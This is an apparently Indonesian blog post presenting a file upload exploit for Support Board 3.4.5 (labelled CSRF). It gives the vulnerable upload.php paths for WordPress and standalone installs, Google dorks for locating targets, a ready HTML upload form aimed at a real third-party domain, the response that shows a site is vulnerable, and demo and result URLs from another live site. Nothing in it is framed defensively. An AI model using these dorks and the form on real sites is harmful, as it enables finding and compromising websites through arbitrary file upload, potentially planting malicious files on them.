Support Board 3.4.5 CSRF File Upload
yo gabut kan lu pada yaudah sama
yo gabut kan lu pada yaudah sama
makanya gw bikin artikel ini
langsung aja, mager saya.
On Non-WP:
/supportboard/include/upload.php
Dork Non-WP:
inurl:supportboard/uploads/
/supportboard/include/upload.php
Dork Non-WP:
inurl:supportboard/uploads/
On WP:
/wp-content/plugins/supportboard/supportboard/include/upload.php
Dork for WP:
/wp-content/plugins/supportboard/supportboard/uploads/
/wp-content/plugins/supportboard/supportboard/include/upload.php
Dork for WP:
/wp-content/plugins/supportboard/supportboard/uploads/
Postfile: file
CSRF Code:
<form action="https://www.support.angohost.ao/supportboard/include/upload.php" method="post" target="_blank">
<input type="file" name="file">
<input type="submit" name="kill" value=">>">
</form>
Path file:
/supportboard/uploads/path/(tanggal)/randomname_namafile.jpg
/~path/uploads/(tanggal)/randomname_namafile.jpg
kalo vuln , upload.php bakal muncul tulisan ini:
["error","Support Board Error: Key file in $_FILES not found."]
Demo:
https://www.jenius.online/wp-content/plugins/supportboard/supportboard/include/upload.php
Result:
https://www.jenius.online/wp-content/uploads/sb/11-05-22/3477_test.txt
Success upload will show text like:
["success","SB_URL\/uploads\/(timestamp)\/(random)_(your file name).jpg"]
Sekian Terimagaji
0 Komentar